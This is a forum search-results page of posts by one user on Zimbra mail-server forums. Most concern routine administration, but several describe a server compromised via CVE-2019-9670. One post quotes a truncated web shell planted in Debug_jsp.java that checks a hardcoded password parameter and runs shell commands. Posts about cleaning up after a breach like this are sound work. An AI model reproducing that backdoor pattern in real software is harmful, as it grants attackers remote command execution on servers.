Search found 16 matches

by elby
Thu Nov 02, 2023 11:59 am
Forum: Administrators
Topic: Zimbra whitelist
Replies: 1
Views: 2502

Zimbra whitelist

I use this script : =============== https://wiki.zimbra.com/index.php?title=Improving_Anti-spam_system User white/black list It very simple changing amavis config: put in /opt/zimbra/conf/amavis.conf.in read_hash(\%whitelist_sender, '/etc/zimbra/whitelist'); read_hash(\%blacklist_sender, '/etc/zimbr...
by elby
Mon Apr 26, 2021 8:52 am
Forum: Installation and Upgrade
Topic: Zimbra without a purchased domain name and a public IP?
Replies: 15
Views: 13601

Re: Zimbra without a purchased domain name and a public IP?

notooth wrote:This is my new /etc/hosts, but it does not fix the error:

Code: Select all

127.0.0.1 localhost.localdomain localhost
192.168.100.200 NetBSD.my.domain NetBSD
Did you find a solution?
by elby
Fri May 31, 2019 8:25 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited (Hacked Server)
Replies: 248
Views: 631800

Re: CVE-2019-9670 being actively exploited

Help me with this plz : /opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java:if("lMIAb3JS-s7dPUDkAZA-O8INcT4vQWNQ_oILtGOGZLE".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","...
by elby
Fri May 31, 2019 7:40 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited (Hacked Server)
Replies: 248
Views: 631800

Re: CVE-2019-9670 being actively exploited

The problem appeared again. Do you have these folders? /opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp with: /opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.class /opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java and /opt/zimb...
by elby
Thu May 30, 2019 11:48 am
Forum: Administrators
Topic: Zimbra AJAX Webmail not loading
Replies: 127
Views: 120517

Re: Zimbra AJAX Webmail not loading

I have my zimbra 8.6 with the last patch I that I downloaded from ZImbras site, patch 14. My OS is Redhat 6.6. The servers is pattched but what can I do to remove this script? Thanks for any help. Thanks to Drake for support :) Zimbra 8.6.0 GA Network Editions , CentOS 6.6 Patch Zimbra : wget https...
by elby
Thu May 30, 2019 7:45 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited (Hacked Server)
Replies: 248
Views: 631800

Re: CVE-2019-9670 being actively exploited

Thanks to Drake for support :) Zimbra 8.6.0 GA Network Editions , CentOS 6.6 Patch Zimbra : wget https://files.zimbra.com/downloads/8.6.0_GA/zcs-patch-8.6.0_GA_1242.tgz tar xzf zcs-patch-8.6.0_GA_1242.tgz cd /tar xzf zcs-patch-8.6.0_GA_1242 Delete global admin accounts Change password # Zimbra AJAX...
by elby
Wed May 29, 2019 2:38 pm
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited (Hacked Server)
Replies: 248
Views: 631800

Re: CVE-2019-9670 being actively exploited

How do I extract the original files from the installation source to replace the infected files with them? Under Windows.


Zimbra 8.6.0_GA Network Editions

edit: https://www.altap.cz/salamander/feature ... r-windows/
by elby
Wed May 29, 2019 10:45 am
Forum: Administrators
Topic: Zimbra AJAX Webmail not loading
Replies: 127
Views: 120517

Re: Zimbra AJAX Webmail not loading

Ignat wrote:i hava a same problem with server . i founded many global admin accounts in users newly created
How to list/ view global admin accounts?


How to create and Admin account
by elby
Wed May 29, 2019 8:32 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited (Hacked Server)
Replies: 248
Views: 631800

Re: CVE-2019-9670 being actively exploited

I find this: ==== /opt/zimbra/libexec/600.zimbra:if [ -f /opt/zimbra/log/swatch.pid ]; then echo "Restarting zmswatch"; $SU "/opt/zimbra/bin/zmswatchctl reload"; fi /opt/zimbra/libexec/zmrcd: "start snmp" => "/opt/zimbra/bin/zmswatchctl start", /opt/zimbra/lib...
by elby
Tue May 28, 2019 10:56 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited (Hacked Server)
Replies: 248
Views: 631800

Re: CVE-2019-9670 being actively exploited

I did not express myself correctly.
Everything from my crontab was removed - only one line left to start exploit.